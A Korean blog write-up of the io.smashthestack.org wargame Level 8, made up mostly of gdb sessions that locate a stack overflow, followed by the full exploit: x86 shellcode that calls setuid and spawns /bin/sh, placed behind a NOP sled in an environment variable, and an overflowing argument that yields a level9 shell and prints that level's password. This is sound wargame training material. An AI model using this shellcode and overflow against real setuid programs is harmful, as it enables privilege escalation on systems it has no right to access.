io - SmashTheStack

io.smashthestack.org – Level 8

Leave a comment on io.smashthestack.org – Level 8

Level 8 문제 소스는 아래와 같다.
우선 gdb를 이용하여 디버깅을 해보도록 하자.

level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) disassemble main
Dump of assembler code for function main:
0x08048400 <main+0>:    lea    0x4(%esp),%ecx
0x08048404 <main+4>:    and    $0xfffffff0,%esp
0x08048407 <main+7>:    pushl  -0x4(%ecx)
0x0804840a <main+10>:   push   %ebp
0x0804840b <main+11>:   mov    %esp,%ebp
0x0804840d <main+13>:   push   %ecx
0x0804840e <main+14>:   sub    $0x4,%esp
0x08048411 <main+17>:   mov    0x4(%ecx),%eax
0x08048414 <main+20>:   mov    %eax,(%esp)
0x08048417 <main+23>:   call   0x8048394 <do_the_nasty>
0x0804841c <main+28>:   mov    $0x0,%eax
0x08048421 <main+33>:   add    $0x4,%esp
0x08048424 <main+36>:   pop    %ecx
0x08048425 <main+37>:   pop    %ebp
0x08048426 <main+38>:   lea    -0x4(%ecx),%esp
0x08048429 <main+41>:   ret    
End of assembler dump.
(gdb) b do_the_nasty
Breakpoint 1 at 0x8048398
(gdb) r `python -c "print 'A'*32 + ' ' + 'B'*10"`
Starting program: /levels/level08 `python -c "print 'A'*32 + ' ' + 'B'*10"`

Breakpoint 1, 0x08048398 in do_the_nasty ()
(gdb) n
Single stepping until exit from function do_the_nasty, 
which has no line number information.
0x0804841c in main ()
(gdb) x/32wx $esp
0xbfffdc70:     0xbfffdd14      0xbfffdc90      0xbfffdce8      0x42536455
0xbfffdc80:     0x42424242      0x42424242      0xbfff0042      0x00536455
0xbfffdc90:     0x00000003      0xbfffdd14      0xbfffdd24      0x006e4b18
0xbfffdca0:     0x00000001      0x00000001      0x00000000      0x0804820d
0xbfffdcb0:     0x00659ff4      0x08048480      0x080482f0      0xbfffdce8
0xbfffdcc0:     0xebb92081      0xb2c835fe      0x00000000      0x00000000
0xbfffdcd0:     0x00000000      0x00da02e0      0x0053637d      0x00da7ff4
0xbfffdce0:     0x00000003      0x080482f0      0x00000000      0x08048311
(gdb) x/32wx $esp-50
0xbfffdc3e:     0xdc440000      0x4141bfff      0x41414141      0x41414141
0xbfffdc4e:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdc5e:     0x41414141      0x82f04141      0xdc780804      0x841cbfff
0xbfffdc6e:     0xdd140804      0xdc90bfff      0xdce8bfff      0x6455bfff
0xbfffdc7e:     0x42424253      0x42424242      0x00424242      0x6455bfff
0xbfffdc8e:     0x00030053      0xdd140000      0xdd24bfff      0x4b18bfff
0xbfffdc9e:     0x0001006e      0x00010000      0x00000000      0x820d0000
0xbfffdcae:     0x9ff40804      0x84800065      0x82f00804      0xdce80804
(gdb) x/32wx $esp-48
0xbfffdc40:     0xbfffdc44      0x41414141      0x41414141      0x41414141
0xbfffdc50:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdc60:     0x41414141      0x080482f0      0xbfffdc78      0x0804841c
0xbfffdc70:     0xbfffdd14      0xbfffdc90      0xbfffdce8      0x42536455
0xbfffdc80:     0x42424242      0x42424242      0xbfff0042      0x00536455
0xbfffdc90:     0x00000003      0xbfffdd14      0xbfffdd24      0x006e4b18
0xbfffdca0:     0x00000001      0x00000001      0x00000000      0x0804820d
0xbfffdcb0:     0x00659ff4      0x08048480      0x080482f0      0xbfffdce8
(gdb) x/32wx 0xbfffdc78
0xbfffdc78:     0xbfffdce8      0x42536455      0x42424242      0x42424242
0xbfffdc88:     0xbfff0042      0x00536455      0x00000003      0xbfffdd14
0xbfffdc98:     0xbfffdd24      0x006e4b18      0x00000001      0x00000001
0xbfffdca8:     0x00000000      0x0804820d      0x00659ff4      0x08048480
0xbfffdcb8:     0x080482f0      0xbfffdce8      0xebb92081      0xb2c835fe
0xbfffdcc8:     0x00000000      0x00000000      0x00000000      0x00da02e0
0xbfffdcd8:     0x0053637d      0x00da7ff4      0x00000003      0x080482f0
0xbfffdce8:     0x00000000      0x08048311      0x08048400      0x00000003
(gdb) x/32wx 0xbfffdce8
0xbfffdce8:     0x00000000      0x08048311      0x08048400      0x00000003
0xbfffdcf8:     0xbfffdd14      0x08048480      0x08048430      0x00d9b250
0xbfffdd08:     0xbfffdd0c      0x00da5ae5      0x00000003      0xbfffddf7
0xbfffdd18:     0xbfffde07      0xbfffde28      0x00000000      0xbfffde33
0xbfffdd28:     0xbfffdec0      0xbfffded0      0xbfffdedb      0xbfffdefd
0xbfffdd38:     0xbfffdf10      0xbfffdf1c      0xbfffdf28      0xbfffdf55
0xbfffdd48:     0xbfffdf6b      0xbfffdf7a      0xbfffdf87      0xbfffdf90
0xbfffdd58:     0xbfffdfa2      0xbfffdfaa      0xbfffdfb9      0x00000000
(gdb) q
The program is running.  Exit anyway? (y or n) y
level8@io:/tmp/by8$

위에서 보면 argv[2]에 좀 더 값을 주면 흐름을 바꿀 수 있을 것으로 보인다. 다시 한번 해보도록 하자.

level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) disassemble main
Dump of assembler code for function main:
0x08048400 <main+0>:    lea    0x4(%esp),%ecx
0x08048404 <main+4>:    and    $0xfffffff0,%esp
0x08048407 <main+7>:    pushl  -0x4(%ecx)
0x0804840a <main+10>:   push   %ebp
0x0804840b <main+11>:   mov    %esp,%ebp
0x0804840d <main+13>:   push   %ecx
0x0804840e <main+14>:   sub    $0x4,%esp
0x08048411 <main+17>:   mov    0x4(%ecx),%eax
0x08048414 <main+20>:   mov    %eax,(%esp)
0x08048417 <main+23>:   call   0x8048394 <do_the_nasty>
0x0804841c <main+28>:   mov    $0x0,%eax
0x08048421 <main+33>:   add    $0x4,%esp
0x08048424 <main+36>:   pop    %ecx
0x08048425 <main+37>:   pop    %ebp
0x08048426 <main+38>:   lea    -0x4(%ecx),%esp
0x08048429 <main+41>:   ret    
End of assembler dump.
(gdb) b do_the_nasty
Breakpoint 1 at 0x8048398
(gdb) r `python -c "print 'A'*32 + ' ' + 'B'*200"`
Starting program: /levels/level08 `python -c "print 'A'*32 + ' ' + 'B'*200"`

Breakpoint 1, 0x08048398 in do_the_nasty ()
(gdb) n
Single stepping until exit from function do_the_nasty, 
which has no line number information.
0x0804841c in main ()
(gdb) x/32wx $esp
0xbfffdbb0:     0xbfffdc54      0xbfffdbd0      0xbfffdc28      0x423e0455
0xbfffdbc0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbd0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbe0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbf0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc00:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc10:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc20:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb) x/32wx $esp-50
0xbfffdb7e:     0xdb840000      0x4141bfff      0x41414141      0x41414141
0xbfffdb8e:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdb9e:     0x41414141      0x82f04141      0xdbb80804      0x841cbfff
0xbfffdbae:     0xdc540804      0xdbd0bfff      0xdc28bfff      0x0455bfff
0xbfffdbbe:     0x4242423e      0x42424242      0x42424242      0x42424242
0xbfffdbce:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbde:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbee:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb) x/32wx $esp-48
0xbfffdb80:     0xbfffdb84      0x41414141      0x41414141      0x41414141
0xbfffdb90:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdba0:     0x41414141      0x080482f0      0xbfffdbb8      0x0804841c
0xbfffdbb0:     0xbfffdc54      0xbfffdbd0      0xbfffdc28      0x423e0455
0xbfffdbc0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbd0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbe0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbf0:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb) x/32wx 0xbfffdbb8
0xbfffdbb8:     0xbfffdc28      0x423e0455      0x42424242      0x42424242
0xbfffdbc8:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbd8:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbe8:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbf8:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc08:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc18:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc28:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb) x/32wx 0xbfffdc28
0xbfffdc28:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc38:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc48:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc58:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc68:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc78:     0x42424242      0x42424242      0x42424242      0x00424242
0xbfffdc88:     0xbfffdf6b      0xbfffdf7a      0xbfffdf87      0xbfffdf90
0xbfffdc98:     0xbfffdfa2      0xbfffdfaa      0xbfffdfb9      0x00000000
(gdb)

원하는대로 흐름이 넘어온 것을 확인할 수 있었다. 따라서 [A32] + [SHELLCODE의 주소 200] 으로 공격을 시도해 보도록 하자.

level8@io:/tmp/by8$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x804840e
(gdb) r
Starting program: /levels/level08 

Breakpoint 1, 0x0804840e in main ()
(gdb) x/32wx $esp
0xbfffdca4:     0xbfffdcc0      0xbfffdd18      0x00126455      0x08048480
0xbfffdcb4:     0x080482f0      0xbfffdd18      0x00126455      0x00000001
0xbfffdcc4:     0xbfffdd44      0xbfffdd4c      0x005c7b18      0x00000001
0xbfffdcd4:     0x00000001      0x00000000      0x0804820d      0x00249ff4
0xbfffdce4:     0x08048480      0x080482f0      0xbfffdd18      0xebb98081
0xbfffdcf4:     0x30c835fe      0x00000000      0x00000000      0x00000000
0xbfffdd04:     0x00d0d2e0      0x0012637d      0x00d14ff4      0x00000001
0xbfffdd14:     0x080482f0      0x00000000      0x08048311      0x08048400
(gdb) 
0xbfffdd24:     0x00000001      0xbfffdd44      0x08048480      0x08048430
0xbfffdd34:     0x00d08250      0xbfffdd3c      0x00d12ae5      0x00000001
0xbfffdd44:     0xbfffde23      0x00000000      0xbfffde33      0xbfffdec0
0xbfffdd54:     0xbfffded0      0xbfffdedb      0xbfffdefd      0xbfffdf10
0xbfffdd64:     0xbfffdf1c      0xbfffdf28      0xbfffdf55      0xbfffdf6b
0xbfffdd74:     0xbfffdf7a      0xbfffdf87      0xbfffdf90      0xbfffdfa2
0xbfffdd84:     0xbfffdfaa      0xbfffdfb9      0x00000000      0x00000010
0xbfffdd94:     0xbfebfbff      0x00000006      0x00001000      0x00000011
(gdb) 
0xbfffdda4:     0x00000064      0x00000003      0x08048034      0x00000004
0xbfffddb4:     0x00000020      0x00000005      0x00000007      0x00000007
0xbfffddc4:     0x00cfa000      0x00000008      0x00000000      0x00000009
0xbfffddd4:     0x080482f0      0x0000000b      0x000003f0      0x0000000c
0xbfffdde4:     0x000003f0      0x0000000d      0x000003f0      0x0000000e
0xbfffddf4:     0x000003f0      0x00000017      0x00000000      0x0000000f
0xbfffde04:     0xbfffde1b      0x00000000      0x00000000      0x00000000
0xbfffde14:     0x00000000      0x69000000      0x00363836      0x2f000000
(gdb) 
0xbfffde24:     0x6576656c      0x6c2f736c      0x6c657665      0x53003830
0xbfffde34:     0x4c4c4548      0x45444f43      0x9090903d      0x90909090
0xbfffde44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde84:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde94:     0x90909090      0x90909090      0x90909090      0x58176a90
(gdb) q
The program is running.  Exit anyway? (y or n) y
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\x94\xde\xff\xbf'*200"`
Segmentation fault
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\xff\xbf\x94\xde'*200"`        
Segmentation fault
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\xbf\x94\xde\xff'*200"`    
sh-3.2$ id              
uid=1008(level8) gid=1008(level8) euid=1009(level9) groups=1008(level8),1029(nosu)
sh-3.2$ cat /home/level9/.pass
ynfbxd6t
sh-3.2$

쉘코드를 환경변수에 입력하여 주소의 위치가 변경되어 조금씩 바꾸어 주다 보면 주소가 맞아 떨어진다...

ByJJoon

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다